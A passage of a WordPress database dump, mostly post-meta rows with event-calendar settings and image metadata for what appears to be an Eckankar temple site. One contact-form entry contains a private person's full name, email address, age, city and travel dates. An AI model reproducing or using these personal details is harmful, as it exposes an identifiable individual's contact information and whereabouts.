/>\r\n%%blog_name%%</p>\";}}'),(168431,267102,'passster_activate_global_protection',NULL),(168432,267102,'passster_activate_protection',NULL),(168433,267102,'passster_protection_type','password'),(168434,267102,'boldgrid_in_page_containers','1'),(168437,267102,'_dp_original','267101'),(168436,267102,'_thumbnail_id','266355'),(168438,267102,'_edit_lock','1661613519:15'),(168439,267102,'_edit_last','15'),(168440,267103,'protect_children',''),(168441,267103,'mec_color',''),(168442,267103,'mec_location_id','161'),(168443,267103,'mec_dont_show_map','0'),(168444,267103,'mec_organizer_id','1'),(168445,267103,'mec_read_more',''),(168446,267103,'mec_more_info',''),(168447,267103,'mec_more_info_title',''),(168448,267103,'mec_more_info_target','_self'),(168449,267103,'mec_cost',''),(168450,267103,'mec_currency','a:0:{}'),(168451,267103,'mec_additional_organizer_ids','a:0:{}'),(168452,267103,'mec_additional_location_ids','a:0:{}'),(168453,267103,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-16\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-16\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(168454,267103,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(168455,267103,'mec_certain_weekdays','a:0:{}'),(168456,267103,'mec_allday','0'),(168457,267103,'one_occurrence','0'),(168458,267103,'mec_hide_time','0'),(168459,267103,'mec_hide_end_time','0'),(168460,267103,'mec_comment',''),(168461,267103,'mec_timezone','global'),(168462,267103,'mec_countdown_method','global'),(168463,267103,'mec_public','1'),(168464,267103,'mec_start_date','2022-10-16'),(168465,267103,'mec_start_time_hour','4'),(168466,267103,'mec_start_time_minutes','0'),(168467,267103,'mec_start_time_ampm','PM'),(168468,267103,'mec_start_day_seconds','57600'),(168469,267103,'mec_end_date','2022-10-16'),(168470,267103,'mec_end_time_hour','5'),(168471,267103,'mec_end_time_minutes','30'),(168472,267103,'mec_end_time_ampm','PM'),(168473,267103,'mec_end_day_seconds','63000'),(168474,267103,'mec_repeat_status','0'),(168475,267103,'mec_repeat_type',''),(168476,267103,'mec_repeat_interval','1'),(168477,267103,'mec_repeat_end',''),(168478,267103,'mec_repeat_end_at_occurrences',''),(168479,267103,'mec_repeat_end_at_date',''),(168480,267103,'mec_advanced_days','a:0:{}'),(168481,267103,'mec_in_days',''),(168482,267103,'mec_not_in_days',''),(168483,267103,'mec_hourly_schedules','a:0:{}'),(168484,267103,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(168485,267103,'mec_tickets','a:0:{}'),(168486,267103,'mec_fees_global_inheritance','1'),(168487,267103,'mec_fees','a:0:{}'),(168488,267103,'mec_ticket_variations_global_inheritance','1'),(168489,267103,'mec_ticket_variations','a:0:{}'),(168490,267103,'mec_reg_fields_global_inheritance','1'),(168491,267103,'mec_reg_fields','a:0:{}'),(168492,267103,'mec_bfixed_fields','a:0:{}'),(168493,267103,'mec_op','a:0:{}'),(168494,267103,'mec_fields','a:0:{}'),(168495,267103,'mec_event_status','EventScheduled'),(168496,267103,'mec_moved_online_link',''),(168497,267103,'mec_cancelled_reason',''),(168498,267103,'mec_display_cancellation_reason_in_single_page',''),(168499,267103,'boldgrid_hide_page_title','0'),(168500,267103,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(168501,267103,'passster_activate_global_protection',NULL),(168502,267103,'passster_activate_protection',NULL),(168503,267103,'passster_protection_type','password'),(168504,267103,'boldgrid_in_page_containers','1'),(168505,267103,'_thumbnail_id','267104'),(168507,267103,'_dp_original','267102'),(168508,267103,'_edit_lock','1661614029:15'),(168509,267103,'_edit_last','15'),(168510,267104,'_wp_attached_file','2022/08/BrightLight.webp'),(168511,267104,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:24:\"2022/08/BrightLight.webp\";s:8:\"filesize\";i:3494;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"BrightLight-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2050;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"BrightLight-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:986;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:24:\"BrightLight-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:1840;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:24:\"BrightLight-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3222;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:24:\"BrightLight-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2576;}s:8:\"tileview\";a:5:{s:4:\"file\";s:24:\"BrightLight-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:1842;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168512,267105,'protect_children',''),(168513,267105,'mec_color',''),(168514,267105,'mec_location_id','161'),(168515,267105,'mec_dont_show_map','0'),(168516,267105,'mec_organizer_id','1'),(168517,267105,'mec_read_more',''),(168518,267105,'mec_more_info',''),(168519,267105,'mec_more_info_title',''),(168520,267105,'mec_more_info_target','_self'),(168521,267105,'mec_cost',''),(168522,267105,'mec_currency','a:0:{}'),(168523,267105,'mec_additional_organizer_ids','a:0:{}'),(168524,267105,'mec_additional_location_ids','a:0:{}'),(168525,267105,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-11-06\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-11-06\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(168526,267105,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(168527,267105,'mec_certain_weekdays','a:0:{}'),(168528,267105,'mec_allday','0'),(168529,267105,'one_occurrence','0'),(168530,267105,'mec_hide_time','0'),(168531,267105,'mec_hide_end_time','0'),(168532,267105,'mec_comment',''),(168533,267105,'mec_timezone','global'),(168534,267105,'mec_countdown_method','global'),(168535,267105,'mec_public','1'),(168536,267105,'mec_start_date','2022-11-06'),(168537,267105,'mec_start_time_hour','4'),(168538,267105,'mec_start_time_minutes','0'),(168539,267105,'mec_start_time_ampm','PM'),(168540,267105,'mec_start_day_seconds','57600'),(168541,267105,'mec_end_date','2022-11-06'),(168542,267105,'mec_end_time_hour','5'),(168543,267105,'mec_end_time_minutes','30'),(168544,267105,'mec_end_time_ampm','PM'),(168545,267105,'mec_end_day_seconds','63000'),(168546,267105,'mec_repeat_status','0'),(168547,267105,'mec_repeat_type',''),(168548,267105,'mec_repeat_interval','1'),(168549,267105,'mec_repeat_end',''),(168550,267105,'mec_repeat_end_at_occurrences',''),(168551,267105,'mec_repeat_end_at_date',''),(168552,267105,'mec_advanced_days','a:0:{}'),(168553,267105,'mec_in_days',''),(168554,267105,'mec_not_in_days',''),(168555,267105,'mec_hourly_schedules','a:0:{}'),(168556,267105,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(168557,267105,'mec_tickets','a:0:{}'),(168558,267105,'mec_fees_global_inheritance','1'),(168559,267105,'mec_fees','a:0:{}'),(168560,267105,'mec_ticket_variations_global_inheritance','1'),(168561,267105,'mec_ticket_variations','a:0:{}'),(168562,267105,'mec_reg_fields_global_inheritance','1'),(168563,267105,'mec_reg_fields','a:0:{}'),(168564,267105,'mec_bfixed_fields','a:0:{}'),(168565,267105,'mec_op','a:0:{}'),(168566,267105,'mec_fields','a:0:{}'),(168567,267105,'mec_event_status','EventScheduled'),(168568,267105,'mec_moved_online_link',''),(168569,267105,'mec_cancelled_reason',''),(168570,267105,'mec_display_cancellation_reason_in_single_page',''),(168571,267105,'boldgrid_hide_page_title','0'),(168572,267105,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(168573,267105,'passster_activate_global_protection',NULL),(168574,267105,'passster_activate_protection',NULL),(168575,267105,'passster_protection_type','password'),(168576,267105,'boldgrid_in_page_containers','1'),(168577,267105,'_thumbnail_id','266408'),(168579,267105,'_dp_original','267103'),(168580,267105,'_edit_lock','1661614772:15'),(168581,267105,'_edit_last','15'),(168582,267106,'protect_children',''),(168583,267106,'mec_color',''),(168584,267106,'mec_location_id','161'),(168585,267106,'mec_dont_show_map','0'),(168586,267106,'mec_organizer_id','1'),(168587,267106,'mec_read_more',''),(168588,267106,'mec_more_info',''),(168589,267106,'mec_more_info_title',''),(168590,267106,'mec_more_info_target','_self'),(168591,267106,'mec_cost',''),(168592,267106,'mec_currency','a:0:{}'),(168593,267106,'mec_additional_organizer_ids','a:0:{}'),(168594,267106,'mec_additional_location_ids','a:0:{}'),(168595,267106,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-11-20\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-11-20\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(168596,267106,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(168597,267106,'mec_certain_weekdays','a:0:{}'),(168598,267106,'mec_allday','0'),(168599,267106,'one_occurrence','0'),(168600,267106,'mec_hide_time','0'),(168601,267106,'mec_hide_end_time','0'),(168602,267106,'mec_comment',''),(168603,267106,'mec_timezone','global'),(168604,267106,'mec_countdown_method','global'),(168605,267106,'mec_public','1'),(168606,267106,'mec_start_date','2022-11-20'),(168607,267106,'mec_start_time_hour','4'),(168608,267106,'mec_start_time_minutes','0'),(168609,267106,'mec_start_time_ampm','PM'),(168610,267106,'mec_start_day_seconds','57600'),(168611,267106,'mec_end_date','2022-11-20'),(168612,267106,'mec_end_time_hour','5'),(168613,267106,'mec_end_time_minutes','30'),(168614,267106,'mec_end_time_ampm','PM'),(168615,267106,'mec_end_day_seconds','63000'),(168616,267106,'mec_repeat_status','0'),(168617,267106,'mec_repeat_type',''),(168618,267106,'mec_repeat_interval','1'),(168619,267106,'mec_repeat_end',''),(168620,267106,'mec_repeat_end_at_occurrences',''),(168621,267106,'mec_repeat_end_at_date',''),(168622,267106,'mec_advanced_days','a:0:{}'),(168623,267106,'mec_in_days',''),(168624,267106,'mec_not_in_days',''),(168625,267106,'mec_hourly_schedules','a:0:{}'),(168626,267106,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(168627,267106,'mec_tickets','a:0:{}'),(168628,267106,'mec_fees_global_inheritance','1'),(168629,267106,'mec_fees','a:0:{}'),(168630,267106,'mec_ticket_variations_global_inheritance','1'),(168631,267106,'mec_ticket_variations','a:0:{}'),(168632,267106,'mec_reg_fields_global_inheritance','1'),(168633,267106,'mec_reg_fields','a:0:{}'),(168634,267106,'mec_bfixed_fields','a:0:{}'),(168635,267106,'mec_op','a:0:{}'),(168636,267106,'mec_fields','a:0:{}'),(168637,267106,'mec_event_status','EventScheduled'),(168638,267106,'mec_moved_online_link',''),(168639,267106,'mec_cancelled_reason',''),(168640,267106,'mec_display_cancellation_reason_in_single_page',''),(168641,267106,'boldgrid_hide_page_title','0'),(168642,267106,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(168643,267106,'passster_activate_global_protection',NULL),(168644,267106,'passster_activate_protection',NULL),(168645,267106,'passster_protection_type','password'),(168646,267106,'boldgrid_in_page_containers','1'),(168647,267106,'_thumbnail_id','265902'),(168649,267106,'_dp_original','267105'),(168650,267106,'_edit_lock','1661615211:15'),(168651,267106,'_edit_last','15'),(168652,267108,'protect_children',''),(168653,267108,'mec_color',''),(168654,267108,'mec_location_id','161'),(168655,267108,'mec_dont_show_map','0'),(168656,267108,'mec_organizer_id','1'),(168657,267108,'mec_read_more',''),(168658,267108,'mec_more_info',''),(168659,267108,'mec_more_info_title',''),(168660,267108,'mec_more_info_target','_self'),(168661,267108,'mec_cost',''),(168662,267108,'mec_currency','a:0:{}'),(168663,267108,'mec_additional_organizer_ids','a:0:{}'),(168664,267108,'mec_additional_location_ids','a:0:{}'),(168665,267108,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-04\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-04\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(168666,267108,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(168667,267108,'mec_certain_weekdays','a:0:{}'),(168668,267108,'mec_allday','0'),(168669,267108,'one_occurrence','0'),(168670,267108,'mec_hide_time','0'),(168671,267108,'mec_hide_end_time','0'),(168672,267108,'mec_comment',''),(168673,267108,'mec_timezone','global'),(168674,267108,'mec_countdown_method','global'),(168675,267108,'mec_public','1'),(168676,267108,'mec_start_date','2022-12-04'),(168677,267108,'mec_start_time_hour','4'),(168678,267108,'mec_start_time_minutes','0'),(168679,267108,'mec_start_time_ampm','PM'),(168680,267108,'mec_start_day_seconds','57600'),(168681,267108,'mec_end_date','2022-12-04'),(168682,267108,'mec_end_time_hour','5'),(168683,267108,'mec_end_time_minutes','30'),(168684,267108,'mec_end_time_ampm','PM'),(168685,267108,'mec_end_day_seconds','63000'),(168686,267108,'mec_repeat_status','0'),(168687,267108,'mec_repeat_type',''),(168688,267108,'mec_repeat_interval','1'),(168689,267108,'mec_repeat_end',''),(168690,267108,'mec_repeat_end_at_occurrences',''),(168691,267108,'mec_repeat_end_at_date',''),(168692,267108,'mec_advanced_days','a:0:{}'),(168693,267108,'mec_in_days',''),(168694,267108,'mec_not_in_days',''),(168695,267108,'mec_hourly_schedules','a:0:{}'),(168696,267108,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(168697,267108,'mec_tickets','a:0:{}'),(168698,267108,'mec_fees_global_inheritance','1'),(168699,267108,'mec_fees','a:0:{}'),(168700,267108,'mec_ticket_variations_global_inheritance','1'),(168701,267108,'mec_ticket_variations','a:0:{}'),(168702,267108,'mec_reg_fields_global_inheritance','1'),(168703,267108,'mec_reg_fields','a:0:{}'),(168704,267108,'mec_bfixed_fields','a:0:{}'),(168705,267108,'mec_op','a:0:{}'),(168706,267108,'mec_fields','a:0:{}'),(168707,267108,'mec_event_status','EventScheduled'),(168708,267108,'mec_moved_online_link',''),(168709,267108,'mec_cancelled_reason',''),(168710,267108,'mec_display_cancellation_reason_in_single_page',''),(168711,267108,'boldgrid_hide_page_title','0'),(168712,267108,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(168713,267108,'passster_activate_global_protection',NULL),(168714,267108,'passster_activate_protection',NULL),(168715,267108,'passster_protection_type','password'),(168716,267108,'boldgrid_in_page_containers','1'),(168717,267108,'_thumbnail_id','264204'),(168719,267108,'_dp_original','267106'),(168720,267108,'_edit_lock','1661633738:15'),(168721,267108,'_edit_last','15'),(168722,267110,'_field_133','Sadie'),(168723,267110,'_field_134','Tennant'),(168724,267110,'_field_135','1sadie.atlas@gmail.com'),(168725,267110,'_field_137','Visiting Colorado- Eck events/ temple hours'),(168726,267110,'_field_138','Good morning :)\n\nI am an 34 year old Eckist in Victoria, Canada, and I have had a pull to to Colorado for quite some time now, and I am finally coming to visit!  I will be there for a travel blogging summit which I found out is only a 15 minute drive from the Eck Temple there. I would love to come visit the temple, and was wondering what hours it will be open etc... I will be in visiting Colorado from September 28- October 3rd.  Will the temple be open for visiting during that time? I would love to connect with other Eckists in the area if possible.   Any other Eck events going on in the area?\nThanks so much for your time.  \n\nSincerely,\nSadie '),(168727,267110,'_form_id','13'),(168728,267110,'_seq_num','114'),(195872,269412,'mec_location_id','129'),(195871,269412,'mec_color',''),(195870,269410,'_seq_num','122'),(195869,269410,'_form_id','61'),(195868,269410,'_field_649',''),(195867,269410,'_field_656','Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom'),(170363,267268,'mec_organizer_id','1'),(170362,267268,'mec_dont_show_map','0'),(170361,267268,'mec_location_id','118'),(170360,267268,'mec_color',''),(168741,79666,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(168742,267117,'_wp_attached_file','2022/09/ocean-3.jpg'),(168743,267117,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1566;s:6:\"height\";i:981;s:4:\"file\";s:19:\"2022/09/ocean-3.jpg\";s:8:\"filesize\";i:321726;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"ocean-3-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14334;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"ocean-3-1024x641.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:641;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126929;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"ocean-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6138;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"ocean-3-768x481.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:481;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76294;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"ocean-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20848;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"ocean-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34596;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"ocean-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23770;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"ocean-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25807;}s:9:\"1536x1536